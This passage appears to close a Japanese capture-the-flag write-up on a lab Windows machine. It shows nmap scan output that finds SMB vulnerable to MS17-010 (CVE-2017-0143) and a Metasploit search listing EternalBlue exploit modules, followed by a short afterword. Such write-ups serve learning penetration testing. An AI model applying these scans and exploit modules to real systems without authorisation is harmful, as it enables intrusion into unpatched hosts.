NSE Timing: About 44.44% done; ETC: 16:31 (0:00:40 remaining)
Completed NSE at 16:31, 34.28s elapsed
Initiating NSE at 16:31
Completed NSE at 16:31, 0.00s elapsed
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Initiating Parallel DNS resolution of 1 host. at 16:31
Completed Parallel DNS resolution of 1 host. at 16:31, 0.04s elapsed
Initiating SYN Stealth Scan at 16:31
Scanning 10.10.10.40 [1000 ports]
Discovered open port 139/tcp on 10.10.10.40
Discovered open port 445/tcp on 10.10.10.40
Discovered open port 135/tcp on 10.10.10.40
Discovered open port 49152/tcp on 10.10.10.40
Discovered open port 49154/tcp on 10.10.10.40
Discovered open port 49155/tcp on 10.10.10.40
Discovered open port 49156/tcp on 10.10.10.40
Discovered open port 49153/tcp on 10.10.10.40
Discovered open port 49157/tcp on 10.10.10.40
Increasing send delay for 10.10.10.40 from 0 to 5 due to 197 out of 656 dropped probes since last increase.
Increasing send delay for 10.10.10.40 from 5 to 10 due to 11 out of 28 dropped probes since last increase.
Increasing send delay for 10.10.10.40 from 10 to 20 due to 11 out of 30 dropped probes since last increase.
Increasing send delay for 10.10.10.40 from 20 to 40 due to 11 out of 24 dropped probes since last increase.
Increasing send delay for 10.10.10.40 from 40 to 80 due to 11 out of 18 dropped probes since last increase.
Increasing send delay for 10.10.10.40 from 80 to 160 due to 11 out of 16 dropped probes since last increase.
Increasing send delay for 10.10.10.40 from 160 to 320 due to 11 out of 13 dropped probes since last increase.
Increasing send delay for 10.10.10.40 from 320 to 640 due to 11 out of 12 dropped probes since last increase.
Increasing send delay for 10.10.10.40 from 640 to 1000 due to 11 out of 11 dropped probes since last increase.
Stats: 0:04:52 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 16:35 (0:00:00 remaining)
Completed SYN Stealth Scan at 16:35, 258.88s elapsed (1000 total ports)
NSE: Script scanning 10.10.10.40.
Initiating NSE at 16:35
Completed NSE at 16:37, 111.50s elapsed
Initiating NSE at 16:37
Completed NSE at 16:37, 0.00s elapsed
Nmap scan report for 10.10.10.40
Host is up (0.33s latency).
Not shown: 991 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
Host script results:
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_smb-vuln-ms10-054: false
NSE: Script Post-scanning.
Initiating NSE at 16:37
Completed NSE at 16:37, 0.00s elapsed
Initiating NSE at 16:37
Completed NSE at 16:37, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 404.92 seconds
Raw packets sent: 1586 (69.784KB) | Rcvd: 1045 (41.836KB)
この部分ですね。
Host script results:
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_smb-vuln-ms10-054: false
CVEからmetasploitで検索をかけても、EternalBlueに関連したモジュールが出てくる。
msf6 > search CVE-2017-0143
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
あとがき
今回も比較的簡単なマシンだったのではないでしょうか。
EternalBlueに関しては、さわりの部分しか扱っていないのでもっと詳しく知りたい方は、ご自身で調べてみることをオススメします。
( EternalBlueって必殺技っぽくてかっこいいね。)